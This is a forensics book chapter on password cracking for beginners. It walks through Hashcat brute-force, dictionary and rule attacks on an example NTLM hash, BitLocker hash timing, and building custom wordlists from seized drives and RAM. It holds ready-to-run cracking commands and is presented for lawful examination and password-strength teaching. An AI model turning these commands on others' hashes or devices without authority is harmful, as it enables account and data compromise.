Now that we know some of the more common methods used to create passwords, and we have access to a good list of millions of potential passwords, we can attempt to crack the example hash using Hashcat. The most recent version of Hashcat can be securely downloaded here⁹⁸ (Hashcat - Advanced Password Recovery, n.d.). Considering the type of calculations performed, it is much more efficient to use the video card of a computer to perform these calculations rather than the CPU. This may cause some compatibility issues, and if so, help on how to install Hashcat can be found on the Hashcat Discord server⁹⁹. I would encourage anyone who has not used Hashcat, or even a command-line tool in general, to follow along at this point on their own Windows machine, even if you have not extracted any hashes up to this point. We will crack the previously mentioned example hash (b4b9b02e6f09a9bd760f388b67351e2b) from Hashcat's website shortly! Once Hashcat is installed, it needs to be launched from the command line, or command prompt, assuming the user is on a Windows system. The simplest method to launch a command prompt window in the correct location is to navigate to where Hashcat is installed (C:\Windows\Programs\hashcat-6.2.5 or similar) using File Explorer, click the white area next to the path so that the path turns blue, type cmd, and press enter. A black window with white text should appear. If you have never used the command line before, congratulations on opening your first terminal window! The next step is to launch Hashcat in help mode. This will also verify that the correct drivers are installed to allow Hashcat to run. Simply type hashcat.exe -h in the command prompt. It is possible that an error occurs stating an OpenCL, HIP, or CUDA installation was not found. If this is the case, I would recommend typing Device Manager in the search bar next to the Windows Start menu and then selecting Display adapters to determine the type of video card installed on the computer. Beyond this, it will require downloading the required drivers from a trusted source to continue using Hashcat. Once again, additional help on how to install Hashcat can be found on the Hashcat Discord Server¹⁰⁰. If hashcat.exe -h is successful, there should be a large amount of output on the screen showing options, hash modes, and examples, ending with some links to the Hashcat website. I find it helpful to save this help information to a simple text file for easy reference. That can be done by pressing the up arrow on the keyboard to display hashcat.exe -h again, but before pressing enter add > Help.txt to the end, for a total command of hashcat.exe -h > Help.txt. This will create a text file in the same folder with the output from the help command, which can be opened in Notepad or similar for quick reference while keeping the command prompt window free to run Hashcat. Open the Help.txt that was just created in the hashcat-6.2.5 folder. Under - [ Hash Modes ] - it shows the numerous types of hashes that can be attacked (and possibly cracked), assuming the hash is properly extracted. Scrolling to the bottom shows some example commands to run Hashcat under - [ Basic Examples ] -.

⁹⁸https://hashcat.net/hashcat/
⁹⁹https://discord.gg/vxvGEMuemw
¹⁰⁰https://discord.gg/vxvGEMuemw
Note that the first Attack-Mode is a Wordlist, but there is also a Brute-Force option. This is not a true brute-force method as discussed earlier, as it does not use all the possible symbols on the keyboard, nor does it use uppercase letters except for the first character. One advantage is that it does not require a dictionary or wordlist to crack a password, so it has its uses. Let's break down this command. Under the example command, the first word is hashcat. It can also be hashcat.exe. This is simple; we are just calling the executable file, but we need to give some input, or arguments, to the program. The next thing we see is -a and then a number, followed by -m and another number. At the top of the help file, under - [ Options ] -, it explains -a as the attack-mode and -m as the hash-type. Both of these are required, but they can be given in either order; we will follow the order shown in the example. Scrolling back down towards the bottom we find - [ Attack Modes ] - where it shows the types of attacks. Brute-Force is 3 while Straight is 0. Brute-Force is Hashcat's version of brute force that was just briefly mentioned, while Straight is a dictionary attack using a wordlist. Now for the other required argument, -m. This stands for hash-type, so we scroll up to the bulk of the help file under - [ Hash Modes ] - and see all the different types. We know this is an NTLM hash, so we need to find the hash-type for NTLM in all of that noise. Rather than manually searching, press CTRL + F to open the find menu and type NTLM. You may get some results like NetNTLMv1, NetNTLMv1+ESS, or NetNTLMv2, and you may have to change your direction of searching to find matches, but you should be able to find just NTLM all on one line with a mode of 1000. Now that we know the required parameters for our two required arguments, on to how to input the hash itself into Hashcat. Hashcat will accept the hash in one of two ways. It can either be pasted directly into the command line, or it can be put into a simple text (.txt) file with one and only one hash per line. If a text file containing multiple hashes is used, they all need to be hashes of the same type, like multiple NTLM hashes or multiple SHA-256 hashes, with each hash on its own line. If attacking multiple hashes, the file method will be faster than trying to crack them one at a time, but it will be slower than a single hash. Pasting directly into the command line can be faster if the hash is already extracted, but the few seconds taken to put the hash into a text file right after extraction may be better in some situations. The example command shows an argument like ?a?a?a?a?a?a after example0.hash, but that is not required. Other arguments can be seen towards the top of the help file, but those are optional. We now know everything required to crack this example NTLM hash: b4b9b02e6f09a9bd760f388b67351e2b.
“Brute-Forcing” with Hashcat

Go to the command line where we typed hashcat.exe -h, type hashcat.exe -a 3 -m 1000 b4b9b02e6f09a9bd760f388b67351e2b, and hit enter. There should be a wall of white text, and then it will stop and show Cracked partway up the screen! Above the Cracked notification there will be the hash, and at the end it will show b4b9b02e6f09a9bd760f388b67351e2b:hashcat. This means the password was hashcat, as can be seen at the top of the Hashcat Wiki webpage. If this is your first time cracking a password, congratulations! You just cracked your first password hash! Now let's examine what Hashcat did during that wall of white text. Scrolling up, we can see the first block of text is similar to the block at the end, but instead of saying Cracked it says Exhausted. Looking at the Guess.Mask row, in the first column we see ?1 [1], and on the next row we see Guess.Charset. The Guess.Charset row shows -1 followed by ?l?u?d. To know what those mean, we need to go back to our help file. Under - [ Built-in Charsets ] -, close to the bottom, we see that l is all lowercase characters, u is all uppercase characters, and d is all digits from 0 to 9. Putting it all together, this means Hashcat tried all lowercase, uppercase, and digits for a password length of 1 before exhausting that keyspace and moving on. Notice how at the top it showed Approaching final keyspace - workload adjusted., which means Hashcat realizes it is about to come to the end of its current run and is preparing what it needs to do next. The second block shows a Guess.Mask of ?1?2 [2]. There was a total of two characters, but this time it is a little different. The ?2 is only ?l and ?d, meaning for the second character it only tried lowercase and digits, but the first character was still ?1, so it tried lowercase, uppercase, and digits as in the first block. The third block is a Guess.Mask of ?1?2?2 [3]: three characters total, trying uppercase, lowercase, and digits for the first and lowercase and digits for the other two. The fourth, fifth, and sixth blocks all show uppercase, lowercase, and digits for the first character with lowercase and digits for the rest. The seventh block is where the hash was cracked, using the same Guess.Mask format of ?1?2?2?2?2?2?2. The password was not long enough to see this in our example, but if we had not cracked it at seven characters, the mask would keep getting longer, and eventually a ?3 would be appended to the end, which also tries the five symbols *!$@_ in addition to lowercase and digits for the last character.
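These built-in charsets can also be used to build your own mask attacks. As a sketch, a targeted seven-character attack that tries lowercase, uppercase, and digits in every position would look like this:

hashcat.exe -a 3 -m 1000 b4b9b02e6f09a9bd760f388b67351e2b -1 ?l?u?d ?1?1?1?1?1?1?1

Here -1 defines a custom charset, and the mask ?1?1?1?1?1?1?1 applies it to all seven positions (enough to reach the all-lowercase "hashcat"). A full keyboard brute force would use ?a in each position instead, with the exponential cost discussed earlier.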
Hashcat's Potfile

This worked for this password, but for more complicated passwords we can see where brute force has its limitations. That is why we need a robust wordlist. So let's try to crack this password again using a wordlist, and in doing so we will discover a useful function of Hashcat. First, find the wordlist that you previously downloaded in File Explorer and unzip it. It may not have a file extension, but Hashcat doesn't care, and the file is probably too big to open in the standard version of Notepad anyway. If you want to see the contents, you should be able to use another text editor like Notepad++ for smaller wordlists, but it is by no means required. Let's go back to the command line where we just cracked the hash and type out a new command. Type hashcat.exe -a 0 -m 1000 b4b9b02e6f09a9bd760f388b67351e2b, not forgetting to put a single space after the hash, but don't hit enter just yet. Hashcat needs the path to the wordlist; note how we are using -a 0 instead of -a 3. If you are savvy with the command line, you could type the path of the file (not forgetting quotes if there are any spaces), or you could copy the path from the File Explorer window (where we typed cmd earlier to open our command prompt window) and then add the file name, but there is an easier way that some may consider cheating. If you are not cheating you are not trying, right? The easiest way is to just drag and drop the uncompressed wordlist into the black area of the command prompt window, and it should populate the whole path to the file in the command line. The whole command should look something like this: hashcat.exe -a 0 -m 1000 b4b9b02e6f09a9bd760f388b67351e2b "D:\My Folder\My Downloaded Wordlist". There may or may not be quotes around the path, depending on whether there are spaces in the folder, subfolders, or file name. Hit enter and see what happens. It should finish very quickly and display a notification of INFO: All hashes found in potfile! Use --show to display them. Well, that is interesting; what is a potfile? Simply put, the potfile is where Hashcat automatically stores hashes it cracks along with the corresponding password in plain text. This is very useful to make sure that time is not wasted trying to crack passwords that have already been cracked, and to make sure a cracked password is saved in case of power failure. It would be most unfortunate if a password was cracked before the examiner could see it and the power went out on a machine that was not hooked up to an uninterruptible power supply due to budgetary concerns. Anyway, go to the hashcat-6.2.5 folder where hashcat.exe is located, find the file named hashcat.potfile, and open it using Notepad or the text editor of your choice. Assuming this is your first time using a freshly downloaded Hashcat, there will only be one entry: b4b9b02e6f09a9bd760f388b67351e2b:hashcat. This is nice for preventing us from wasting time trying to crack it again, but we want to see how to crack it using other methods. Either delete the single entry from the potfile, save, and close, or just delete the whole potfile, as Hashcat will automatically generate a new one upon cracking another password.
Dictionary (Wordlist) Attack with Hashcat

Go back to the command prompt and press the up arrow on the keyboard. Your previously typed command of hashcat.exe -a 0 -m 1000 b4b9b02e6f09a9bd760f388b67351e2b "D:\My Folder\My Downloaded Wordlist" or similar should appear. Press enter to run the command again. Now it should start processing, but it will stop after a moment and display something like Watchdog: Temperature abort trigger set to 90c. As a side note, it is nice to know that Hashcat has built-in safety procedures to help prevent the overheating of video cards, and it will slow down its processing speed if the GPU (aka video card) gets too hot. Anyway, after a few seconds it should display something like Dictionary cache building "D:\My Folder\My Downloaded Wordlist": 1711225339 bytes (10.61%) with the percentage increasing every few seconds. This is normal, and depending on the size of the wordlist it might take a minute or two. This is required the first time a new wordlist is used, but as long as the location of the wordlist does not change, the dictionary cache will not need to be rebuilt each time. Once the dictionary is built, it will display the following line: [s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit =>. This shows what commands we can enter while it is processing. It would be nice to know what is going on, so press the s key. The first thing I look at is the Time.Estimated row, which shows an estimated end date and time and an estimated duration. This is where times can vary greatly based on the type of GPU and the length of the wordlist. Even if a longer wordlist was chosen, it should not take long to crack the password. This assumes that the word “hashcat” is in the dictionary, but hopefully it is there. This method will likely take a bit longer than the brute-force method, but it is much more robust and is one of the best methods for cracking passwords. We are going to try one more method, so go back to the potfile and delete the most recent entry, or just delete the whole potfile.
Dictionary + Rules with Hashcat

The obvious weakness of the dictionary attack is that the password has to be in a precompiled dictionary, but what if it is a complicated password not in a wordlist? What if the user made a password that used unusual symbols, used numbers at the beginning, used numbers instead of letters, or added an unusual number of symbols to the end? This can be cracked by Hashcat using a combined dictionary and rule attack. Hashcat comes preloaded with rules, and additional rules can be downloaded just like wordlists. At this time, I have not found any rules that are noticeably superior to the rules that come standard with Hashcat, but it is left up to the examiner to decide what they want to use. After deleting the most recent entry in the potfile, check the hashcat-6.2.5 folder and there should be a folder named rules. Inside the rules folder there are plenty of prebuilt rules. My personal favorite is the onerulestorulethemall rule, as the name has a nice ring to it. It is also a good rule in general, but again, it is mostly personal preference and trial and error. It is worth mentioning that while these rules are only a few kilobytes in size, they can add a substantial amount of time to how long it takes to process a hash, as all commands in each rule will be applied to each potential password in a wordlist. Just like with dictionary attacks, a bigger rule will take longer and yield more potential passwords, while a smaller rule will be faster but with fewer generated passwords. Go back to the command prompt and press the up arrow. Adding a rule to a dictionary attack is quite easy; we just need to add -r followed by the path to the rule file, after the dictionary at the end of the command. Just add -r to the end of the command, put a space, then drag and drop the rule of your choice into the command prompt window. The command should look something like hashcat.exe -a 0 -m 1000 b4b9b02e6f09a9bd760f388b67351e2b "D:\My Folder\My Downloaded Wordlist" -r "D:\hashcat-6.2.5\rules\onerulestorulethemall.rule". Once the syntax looks good, press enter. This time the dictionary should not have to compile; it will display Dictionary cache hit: and then information on the location of the dictionary. Press the s key on the keyboard to see the status, and note how the Time.Estimated row has increased, possibly to a day or more. Hopefully it will not take longer than a few minutes to crack our example hash again. This method does take longer, but again, we are attacking the hash in a way that will crack more complicated passwords than the previously discussed methods.
Robust Encryption Methods

Up to now we have only cracked an NTLM hash, but what about more robust encryption methods? Go to the Hashcat Example Hashes¹⁰¹ page and search for BitLocker, which should be mode 22100. The resulting hash should be as follows: $bitlocker$1$16$6f972989ddc209f1eccf07313a7266a2$1048576$12$3a33a8eaff5e6f81d907b591$60$316b0f6d4cb445fb056f0e3e0633c413526ff4481bbf588917b70a4e8f8075f5ceb45958a800b42cb7ff9b7f5e17c6145bf8561ea86f52d3592059fb. This is massive compared to the NTLM hash! Try it in Hashcat using the following command: hashcat.exe -a 3 -m 22100 $bitlocker$1$16$6f972989ddc209f1eccf07313a7266a2$1048576$12$3a33a8eaff5e6f81d907b591$60$316b0f6d4cb445fb056f0e3e0633c413526ff4481bbf588917b70a4e8f8075f5ceb45958a800b42cb7ff9b7f5e17c6145bf8561ea86f52d3592059fb. The brute force starts at four characters because BitLocker originally required a minimum password length of four, so Hashcat is smart enough not to waste time trying fewer than four characters when attacking a BitLocker password. For my computer, it shows an estimated time of 1 hour and 19 minutes for just 4 characters. If I let it run and go to 5 characters, it shows it will take 2 days to try just 5 characters! Your computer may show different estimated times, but unless you have a really good gaming computer or are running Hashcat on a computer designed for mining cryptocurrency, you are probably seeing similar numbers. Trying the same BitLocker hash with a straight dictionary attack (no rules) against the cyclone.hashesorg.hashkiller.combined dictionary shows an estimated time of 28 days! Knowing this means that if an NTLM hash could be cracked using the cyclone.hashesorg.hashkiller.combined dictionary, it would take about a month at most for the same BitLocker password to be cracked. This time can be significantly reduced by using a computer with multiple GPUs, like computers used for mining cryptocurrency. This is a really good reason not to have a password that appears in most dictionary attacks, and it shows why strong and complicated passwords are important. This is just examining BitLocker; the VeraCrypt and DiskCryptor example hashes require the download of a file, as they are too large to display on Hashcat's website. This shows a substantial difference between the password protection used by Windows and robust encryption software, but it also shows why it is very important not to reuse passwords. If an attacker can compromise the weak Windows password and the same password is also used for robust encryption software, then the strong encryption method is very easily defeated. It also shows how a robust encryption method can be defeated by using a good wordlist, and why strong passwords are the first line of defense no matter what encryption method is used.

¹⁰¹https://hashcat.net/wiki/doku.php?id=example_hashes
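Hashcat's built-in benchmark mode is a quick way to see for yourself why these estimates differ so dramatically between hash types on your own hardware:

hashcat.exe -b -m 1000
hashcat.exe -b -m 22100

Comparing the two reported speeds shows how a deliberately expensive algorithm like BitLocker's drags cracking rates from billions of guesses per second for NTLM down to a tiny fraction of that.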
Complex Password Testing with Hashcat

Maybe you have gotten the bug by now, our simple hash that is just “hashcat” is not good enough, and you want to try harder potential passwords. The easiest way to attempt to crack more difficult passwords is to use an NTLM hash generator. Online NTLM hash generators hosted on a website may be the easiest route, but there is a major security concern if the user wants to test their own passwords and converts them using an online tool. By using the online tool, the user has likely given up their password to a third party if that online tool is logging input to their website. I would only recommend using an online tool for testing passwords that the user is not actually using, and I would not put even similar passwords to ones currently in use into an online tool. The next best method would be PowerShell functions¹⁰² or Python scripts¹⁰³ that can generate NTLM hashes (see the sketch at the end of this section). These links are just two possible ways to create an NTLM hash; searching Google can find other methods as well. This is much more secure, as the work of converting the password to an NTLM hash is done on the user's computer. Just note that if the password is cracked, it will be saved in the potfile, so it would be wise to either delete the entry from the potfile or delete the potfile altogether once the testing session is complete.

Searching a Dictionary for a Password

Since we have already mentioned that the main weakness of a password is the existence of that password in a wordlist, it might be nice to see if our current password or another potential password shows up in a dictionary. Since these wordlists are very large, it is difficult to find a program that will open them so you can do a simple Ctrl + F search for the password. Fortunately, the command line offers an easier way to search the contents of a file without opening it. Using File Explorer, navigate to the folder where you have downloaded and uncompressed a wordlist. Open a command-line window just like we did for running Hashcat by clicking the white area next to the path so that the path turns blue, typing cmd, and pressing enter. We are going to use the findstr command to search the contents of a dictionary. In the command line, type findstr password and then press [TAB] until the dictionary you want to search appears. The completed command should look something like findstr password MyDictionary. Press enter. If you chose a common password, it should output a wall of white text showing all entries that contain that password. If it just shows a blinking cursor, then it is still searching for a match. When you can type again, it has finished searching. This is a good way to check if a password exists in a dictionary or wordlist, but if the password does not show up, that does not necessarily mean it can't be cracked with that dictionary. An appropriate rule might mangle the wordlist in a way that causes the password to be guessed by Hashcat. Still, since dictionary attacks are the most common and the fastest method of cracking a password, this is a good yet simple test of whether a password is strong or not.

¹⁰²https://github.com/MichaelGrafnetter/DSInternals/blob/master/Documentation/PowerShell/ConvertTo-NTHash.md
¹⁰³https://www.trustedsec.com/blog/generate-an-ntlm-hash-in-3-lines-of-python/
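As promised above, here is a minimal sketch of local NTLM generation and comparison in Python. It assumes hashlib's md4 is available; on some OpenSSL 3.x builds, MD4 lives in the legacy provider and may be unavailable, in which case the linked resources offer alternatives:

import hashlib

def ntlm_hash(password):
    # NTLM is MD4 computed over the UTF-16LE encoding of the password.
    return hashlib.new("md4", password.encode("utf-16le")).hexdigest()

# Hash a test password locally, then compare a guess against it,
# which is exactly what Hashcat automates at scale.
known = ntlm_hash("hashcat")
print(known)                          # b4b9b02e6f09a9bd760f388b67351e2b
print(ntlm_hash("hashcat") == known)  # True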
Generating Custom Wordlists

Now I am going to move into somewhat more advanced concepts and assume that the reader is familiar with forensic examinations of electronic devices. Some of the more basic concepts related to forensic exams will be glossed over when explaining these techniques, and some of the advanced concepts will only be discussed briefly. The remainder of this chapter is simply intended to show what is possible and how it can be useful in a thorough examination. Two reasons for using custom wordlists are attacking a particularly stubborn password (good for them for using a strong password!) and generating a wordlist for forensic tools that require a static wordlist/dictionary to attack alphanumeric passwords, such as those used on some Android devices. As an example of how to use both of these techniques in a forensic examination, let's say an examiner has the legal authority to examine a Windows computer and an Android phone from the same target/suspect user. Both devices are in the examiner's possession. The drive for the computer is not encrypted with BitLocker or other methods, and the examiner was able to acquire an .E01 of the hard drive, but the phone is locked with an alphanumeric password, and unfortunately we have not cracked the NTLM hash with the methods already mentioned. Because the data on the hard drive is not encrypted, there is now a wealth of information about the target, including user-generated data. It is even possible that there is simply a document saved somewhere on the hard drive that contains the user's passwords, including the Windows (NTLM) password and the phone password. Rather than manually looking through the contents of the hard drive, there are tools that will search the hard drive and build wordlists for us. The first tool is the AXIOM Wordlist Generator¹⁰⁴. This requires the examiner to have access to the Magnet AXIOM forensic software. The .E01 image will need to be processed with AXIOM Process, and then the AXIOM Wordlist Generator can be used. Instructions for how to use the AXIOM Wordlist Generator are on Magnet's website. A free alternative that is more comprehensive, but yields more false positives, is to use Bulk Extractor¹⁰⁵ with the following command: bulk_extractor -E wordlist -o <output directory> <imagefile.E01>. For example, if the examiner had acquired an .E01 image of a hard drive, named the acquisition HDD.E01, and wanted to output the wordlist to a folder called Wordlist in the same directory as the HDD.E01 file, with a terminal window open in that directory, the following command would be used: bulk_extractor -E wordlist -o Wordlist HDD.E01. Bulk Extractor comes standard with a Kali Linux build but is also available on Windows. I find it is better to use a Linux box, but to each their own. A virtual machine (VM) of Linux or other access to Kali Linux or similar can be used, as nearly all Linux distributions, including Kali Linux, are free. If using a Linux VM, one option is to use VirtualBox¹⁰⁶. While a VM can be used, it is not difficult to set up a USB thumb drive or an external hard drive with Kali Linux or similar and change the boot order on the computer to boot to a fully functional and persistent Kali Linux. The instructions for this procedure are on the Kali Linux website¹⁰⁷.
I would recommend this second method if you are planning on further customizing wordlists by paring them down as discussed in the next section, but a Kali VM will work as well.

¹⁰⁴https://support.magnetforensics.com/s/article/Generate-wordlists-with-the-AXIOM-Wordlist-Generator
¹⁰⁵https://www.kali.org/tools/bulk-extractor/
¹⁰⁶https://www.virtualbox.org/
¹⁰⁷https://www.kali.org/docs/usb/live-usb-install-with-linux/
Once the wordlist is generated with the preferred method (or both methods), the NTLM password from the Windows machine can be attacked again and hopefully cracked. By using the cracked Windows password, we can then use virtualization software to log in to the suspect machine virtually and examine the saved passwords in Chrome, Edge, or other browsers. With the cracked NTLM password and the saved browser passwords, we now have several potential passwords for the phone. Those exact passwords could be tried on the phone, using a forensic tool of course, but what if the phone uses an unknown variation of those passwords? It is also possible that we have yet to crack even the NTLM password, if it is a strong one. There is still hope if the keyword/baseword used in the password is in the wordlist we have generated. For example, if the target password is 123456Password!@#$%^, we just have to get rid of the noise in the custom wordlist and then mangle the wordlist in a way that will generate the target password. Kali Linux can help us with that process.
Paring Down Custom Wordlists

If a really strong password has been used, then it may not be cracked even with a custom-built wordlist that uses the AXIOM Wordlist Generator and Bulk Extractor to pull potential passwords from the target device. It is also possible that the password uses a word from another language. If this is the case, the examiner will need to focus their efforts even more and get rid of the “noise” in the custom wordlist. It would also be a good idea to download a list of words for the target language. This link¹⁰⁸ is a good place to start when looking for wordlists in other languages. A simple Google search should also yield results for wordlists in the target language. With all three lists (AXIOM wordlist, Bulk Extractor wordlist, and foreign language wordlist), we need to combine them into one list. A simple copy-paste can work, but the lists may be too large to open. Fortunately, Linux has a concatenate command that will combine files. After copying all the files/wordlists to Kali Linux, open up a terminal window and type the following command: cat AXIOMWordlist BulkExtractorWordList ForeignLanguageWordList > CombinedWordList, choosing the correct names of the files, of course. Now we run into the issue of potential duplicate lines. There are tools built into Linux that can deal with duplicate lines, using the following commands: sort CombinedWordList | uniq -d to display duplicates, followed by awk '!seen[$0]++' CombinedWordList > CombinedWordListDedupe to remove them. The problem with this is that we run into the issue of the different line endings/carriage return symbols used by Unix vs Windows. A carriage return is simply the [Return] or [Enter] character at the end of a line that tells the operating system to start a new line. Unix uses a different line ending character than Windows. So two lines may be identical except for the line ending, but this won't be recognized by normal Linux commands and there will still be duplicate lines in our wordlist. There is a program called rling¹⁰⁹ that will need to be compiled on a Linux system. It is not in the normal distributions, so a sudo apt install from the terminal window will not work. Certain dependencies like libdb-dev and Judy may need to be installed using the following commands: sudo apt-get update -y, then sudo apt-get install -y libdb-dev for libdb-dev, and sudo apt-get install -y libjudy-dev for Judy. The rling command will then be run from the location where it was compiled by using ./rling in that directory, unless the entire rling folder is stored in the /usr/share folder on the Linux system after compiling the program. I would recommend copying the rling folder to /usr/share to allow it to run from the terminal window like Hashcat or Bulk Extractor, so you can call the command by simply using rling from anywhere on the system. I understand that this is somewhat technical and I did not go into great detail, but this is the best and fastest method I have found for deduplication that also properly deals with line ending issues. Once we have run the deduplication method of our choice, it may be useful to change the characters that have escaped HTML conversion back to their ASCII equivalents. What this means is there may be a &gt inside a password where what it should contain is simply a >. The way to automate this conversion is with the following command: sed -i 's/&gt/>/g' WordList.txt.
¹⁰⁸https://web.archive.org/web/20120207113205/http:/www.insidepro.com/eng/download.shtml ¹⁰⁹https://github.com/Cynosureprime/rling
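Putting the combining and cleanup steps together (a minimal sketch; the file names are hypothetical, and rling is assumed to be compiled and callable from the shell), the whole pass might look like:

# Combine the three wordlists into a single file
cat AXIOMWordlist BulkExtractorWordList ForeignLanguageWordList > CombinedWordList

# Deduplicate with rling, which copes with mixed Unix/Windows line endings
rling CombinedWordList CombinedWordListDedupe

# Convert stray HTML-escaped characters back to ASCII, in place
sed -i 's/&gt/>/g' CombinedWordListDedupe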
• 92. Chapter 3 - Password Cracking for Beginners 85
Here¹¹⁰ is a partial list of HTML names and their ASCII equivalents. Finally, we may choose to select only potential passwords that are of a certain length. Grep can be very useful here. The following command selects only lines that are between 4 and 16 characters in length: grep -x -E '.{4,16}' WordList.txt > AndroidPWLength.txt. The following command then excludes all PIN codes from the list and selects only alphanumeric passwords: grep -x -E -v '[0-9]+' AndroidPWLength.txt > Alphanumeric.txt. This final list should be a deduplicated list of possible passwords from the AXIOM wordlist, Bulk Extractor, and the foreign language list that can be used against the Android device with the appropriate forensic tool.
Mangling Wordlists In Place
Perhaps the combined wordlist just described still did not crack the stubborn password, and a forensic tool is being used that does not allow rules to be applied on the fly the way Hashcat does. If this is the case, the wordlist will need to be mangled in place before uploading it to the forensic tool. Hashcat can still be used to mangle the wordlist before uploading, but it will need to be done using Linux. As mentioned in the previous section, I prefer Kali Linux, but to each their own. The following instructions show how to mangle the wordlist in place using a Kali Linux OS; the location of the rule list may be different if using a different flavor of Linux. Copy the wordlist to a Kali Linux computer and navigate to the folder that contains the wordlist you want to mangle with the Hashcat rule of your choice. For this example, I will use Wordlist.txt and the best64.rule rule. Open up a terminal window (if you are using the GUI instead of the CLI to navigate) by right-clicking in the area inside of the folder, use the following command, and hit enter: hashcat --force Wordlist.txt -r /usr/share/hashcat/rules/best64.rule --stdout > Wordlist_best64.txt. Once the iteration is complete, the file Wordlist_best64.txt will be created and will contain all of the iterations of Wordlist.txt with the best64.rule rule applied, so that a straight dictionary attack can be used. Keep in mind that this can quickly create massive files even out of smaller wordlists, which is why I am using the much smaller rule set best64.rule rather than OneRuleToRuleThemAll.rule. If even the standard smaller rules create wordlists that are too big to use with the forensic tool, then custom rules can be created. For example, a file named append_exclamation.rule containing only the two lines : and $! (each on its own line) would append an exclamation point to every word in a wordlist, so it would only double the size of the list. More information on how to mangle wordlists using Hashcat can be found at this blog post¹¹¹. It might also be useful to make sure that there are no duplicates by running rling against the wordlist again. Additionally, if a maximum password length is known, it would be good to use grep to remove passwords that are too long, as mentioned in the previous section. ¹¹⁰https://ascii.cl/htmlcodes.htm ¹¹¹https://infinitelogins.com/2020/11/16/using-hashcat-rules-to-create-custom-wordlists/
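As a concrete sketch of the custom rule just described (file names hypothetical), the rule file can be created and applied like this:

# Create the two-line rule file:
#   :    passes each word through unchanged
#   $!   appends an exclamation point to each word
printf ':\n$!\n' > append_exclamation.rule

# Expand the wordlist with the custom rule for a straight dictionary attack
hashcat --force Wordlist.txt -r append_exclamation.rule --stdout > Wordlist_exclamation.txt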
• 93. Chapter 3 - Password Cracking for Beginners 86
Additional Resources and Advanced Techniques
Building Wordlists from RAM
While having the admin password for a computer is pretty much required to acquire its RAM, if RAM has been acquired on a system and there is a need to crack an additional password other than the known admin password, RAM can be a great resource for building a custom wordlist for that system. Once again, Linux is useful for this. The basic process is to run the strings command against an uncompressed RAM capture to extract possible passwords, then use the same Linux tools to deduplicate them. An example command would look like strings Memory_file | sort | uniq > RAMwordlist.txt, where 'Memory_file' is the name of the uncompressed memory image. The generated wordlist can then be used in Hashcat just like any other dictionary attack. For more info, check out a great video¹¹² on the topic by DFIRScience.
Crunch for Generating Random Wordlists
Crunch¹¹³ is a Kali Linux package that allows for the generation of wordlists using a predefined set of characters and a specific length. This can be useful if certain characters are known or if the length of the password is known. It is a bit simpler than using rules in Hashcat, it is easy to use, and it is quite useful for lists of only a few characters in length. It is similar to generating a list for brute-forcing a password, which has the limitations already discussed, but it can still be useful. From the terminal window on a Linux machine, simply type the command sudo apt install crunch to install. The example on their home page shows the command crunch 6 6 0123456789abcdef -o 6chars.txt generating a list of all combinations and permutations of the digits and the letters a-f, and outputting the results to a file.
Combinator Attacks and More by 13Cubed
The 13Cubed YouTube channel¹¹⁴ has excellent and in-depth information on numerous digital forensics concepts. One of his videos covers how to concatenate words together to crack passwords that consist of several words strung together. He also goes over some more advanced topics and concepts related to using Hashcat; check out the first of his two-part series on Hashcat¹¹⁵.
John the Ripper
John the Ripper is similar to Hashcat in many ways, but where I think it really shines is hash extraction, the step that starts the process of cracking a password. John the Ripper can also be used instead of Hashcat to crack the actual hash, and it can mangle wordlists in a similar fashion to the previously described method of using Hashcat on a Linux machine. More info on John the Ripper can be found on their website¹¹⁶. ¹¹²https://www.youtube.com/watch?v=lOTDevvqOq0&ab_channel=DFIRScience ¹¹³https://www.kali.org/tools/crunch/ ¹¹⁴https://www.youtube.com/c/13cubed ¹¹⁵https://www.youtube.com/watch?v=EfqJCKWtGiU&ab_channel=13Cubed ¹¹⁶https://www.openwall.com/john/
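For instance (a minimal sketch; the file names are hypothetical), John the Ripper's bundled *2john utilities can extract a crackable hash from a protected file, which John can then attack with a mangled wordlist:

# Extract a crackable hash from a password-protected archive
zip2john protected.zip > zip.hash

# Attack it with a wordlist, applying John's built-in mangling rules
john --wordlist=CombinedWordList --rules zip.hash

# Show any cracked passwords
john --show zip.hash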
• 94. Chapter 3 - Password Cracking for Beginners 87
Conclusion
This has been a brief dive into how easy it is to crack simple passwords, and hopefully it shows why strong passwords are so important. The Windows operating system uses a weak, unsalted hashing scheme (NTLM) to protect its passwords, and this is a good place to start when trying to crack passwords for fun or for security testing purposes. Even with strong encryption methods, a weak or reused password will not be sufficient to safeguard the data. Knowing that these methods are out there to defeat user passwords should show why it is so important to use strong passwords and why it is a bad idea to reuse passwords between accounts. A better understanding of the attack methods against passwords should encourage everyone to use better security practices to safeguard their data.
References
Cubrilovic, N. (2009, December 14). RockYou hack: From bad to worse. Retrieved May 12, 2022, from TechCrunch¹¹⁷
crunch | Kali Linux Tools. (2021, September 14). Retrieved July 1, 2022, from Kali Linux¹¹⁸
Fast password cracking - Hashcat wordlists from RAM. (2022, June 15). Retrieved June 22, 2022, from YouTube¹¹⁹
Introduction to Hashcat. (2017, July 20). Retrieved June 22, 2022, from YouTube¹²⁰
John the Ripper password cracker. (n.d.). Retrieved June 22, 2022, from John the Ripper¹²¹
Harley. (2020, November 16). Using Hashcat rules to create custom wordlists. Retrieved September 8, 2022, from Infinite Logins: https://infinitelogins.com/2020/11/16/using-hashcat-rules-to-create-custom-wordlists/
hashcat - advanced password recovery. (n.d.). Retrieved May 12, 2022, from Hashcat¹²²
Patton, B. (2022, March 25). NTLM authentication: What it is and why you should avoid using it. Retrieved May 12, 2022, from The Quest Blog¹²³
Picolet, J. (2019). Hash Crack: Password Cracking Manual (v3). Independently published.
W34kp455. (2014). Weakpass. Retrieved May 12, 2022, from Weakpass¹²⁴
¹¹⁷https://techcrunch.com/2009/12/14/rockyou-hack-security-myspace-facebook-passwords/ ¹¹⁸https://www.kali.org/tools/crunch/ ¹¹⁹https://www.youtube.com/watch?v=lOTDevvqOq0&ab_channel=DFIRScience ¹²⁰https://www.youtube.com/watch?v=EfqJCKWtGiU&ab_channel=13Cubed ¹²¹https://www.openwall.com/john/ ¹²²https://hashcat.net/hashcat/ ¹²³https://blog.quest.com/ntlm-authentication-what-it-is-and-why-you-should-avoid-using-it/ ¹²⁴https://weakpass.com/
• 95. Chapter 4 - Large Scale Android Application Analysis
By s3raph¹²⁵ | Website¹²⁶ | Discord¹²⁷
Overview
This chapter provides a cursory overview of Android application analysis through automated and manual methods, followed by a methodology for adjusting to scale.
Introduction
